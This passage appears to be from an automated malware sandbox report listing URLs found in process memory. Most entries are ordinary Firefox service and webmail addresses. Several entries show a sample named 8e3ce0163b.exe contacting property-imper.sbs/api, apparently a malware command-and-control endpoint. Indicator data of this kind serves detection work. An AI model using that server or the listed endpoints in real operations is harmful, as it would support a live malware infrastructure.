Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000018.00000002.2887047262.000001DE05B1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%extensions.formautofill.credit
Source: firefox.exe, 00000018.00000002.2887047262.000001DE05B1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888287606.000001DE05D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885954167.000001DE05AE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000018.00000002.2907746771.000001DE07293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2959734574.000002EE0A400000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000018.00000002.2907746771.000001DE07293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883601667.000001DE058DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.comresource://gre/modules/IndexedDB.sys.mjsWEBEXT_BACKGROUND_PAGE_LOAD
Source: firefox.exe, 00000018.00000002.2833641745.000001DE01021000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2749210013.000001DE03333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2748847321.000001DE03319000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2840328668.000001DE0332B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00DD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2747902475.000001DE03333000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sbrowser.download.viewableInternally.typeWasRegiste
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000018.00000003.2749210013.000001DE03333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2748847321.000001DE03319000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2840328668.000001DE0332B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2958869168.000001DE7FD7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2747902475.000001DE03333000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000018.00000003.2749210013.000001DE03333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2748847321.000001DE03319000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2840328668.000001DE0332B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2958869168.000001DE7FD7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2747902475.000001DE03333000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000018.00000003.2742026560.000001DE740DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2954557391.000001DE740D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825914100.0000021332372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A8086000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestbug-1745237-rollout-fission-beta-96-97-rollout-bet
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource:///modules/UrlbarProviderAutofill.sys.mjs
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.comaccount-connection-disconnectednetwork.proxy.backup.socks_portpictureinpi
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000018.00000002.2960026525.000016FEA1704000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2747902475.000001DE03333000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2958869168.000001DE7FD7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2747902475.000001DE03333000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.yahoo
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.combrowser.launched_to_handlensIBackgroundTasksManagerDEVTOOLS_POLICY_DISAB
Source: 8e3ce0163b.exe, 0000000A.00000003.2891093677.00000000054C5000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2748465921.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2891697872.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2778232779.00000000054C6000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000021.00000002.2967076596.000000000124F000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000021.00000002.2967076596.000000000125D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/
Source: 8e3ce0163b.exe, 00000008.00000003.2848641089.0000000001344000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/9
Source: 8e3ce0163b.exe, 00000008.00000003.2848641089.0000000001344000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/A
Source: 8e3ce0163b.exe, 0000000A.00000003.2839737572.00000000008B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/J0
Source: 8e3ce0163b.exe, 0000000A.00000003.2891800306.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2891093677.00000000054C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/R
Source: 8e3ce0163b.exe, 0000000A.00000003.2839011768.00000000054C6000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2810031884.00000000054C6000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2803092922.00000000054C1000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2891800306.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2891093677.00000000054C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/X
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/Z0P
Source: 8e3ce0163b.exe, 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2804105277.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2777133880.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000002.2965376322.000000000084E000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2809937080.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774328933.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2748097190.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2808373919.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2839326629.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2805048673.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2804105277.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2808480663.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2890843034.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2748465921.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2748465921.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2849532833.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000021.00000002.2967076596.000000000120B000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000021.00000002.2967076596.000000000125D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api
Source: 8e3ce0163b.exe, 0000000A.00000003.2804105277.00000000008BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api#?
Source: 8e3ce0163b.exe, 00000008.00000003.2692062277.0000000001352000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2764231354.0000000001355000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2692285290.0000000001354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api$
Source: 8e3ce0163b.exe, 00000008.00000003.2764231354.0000000001355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiA
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiL?
Source: 8e3ce0163b.exe, 00000008.00000003.2763535585.000000000136B000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2710095347.000000000136B000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2848590300.0000000001361000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiM
Source: 8e3ce0163b.exe, 0000000A.00000003.2748097190.00000000008CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiS
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiY
Source: 8e3ce0163b.exe, 00000008.00000003.2848590300.0000000001361000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api_
Source: 8e3ce0163b.exe, 0000000A.00000003.2748465921.000000000086B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apia
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apisions
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apit#k
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2890843034.00000000008BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiv?
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/s=0&
Source: 8e3ce0163b.exe, 00000008.00000003.2636551359.0000000005A42000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2692211429.0000000005A42000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2635871777.0000000005A42000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2661110811.0000000005A42000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2764104862.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000002.2965376322.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/api
Source: 8e3ce0163b.exe, 00000008.00000003.2764104862.0000000005A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/api-
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/apiK
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000018.00000003.2746356946.000001DE03B5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746175377.000001DE03B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/Vikipedi
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comhttps://support.mozilla.orgtestPermissionFromPrincipal
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
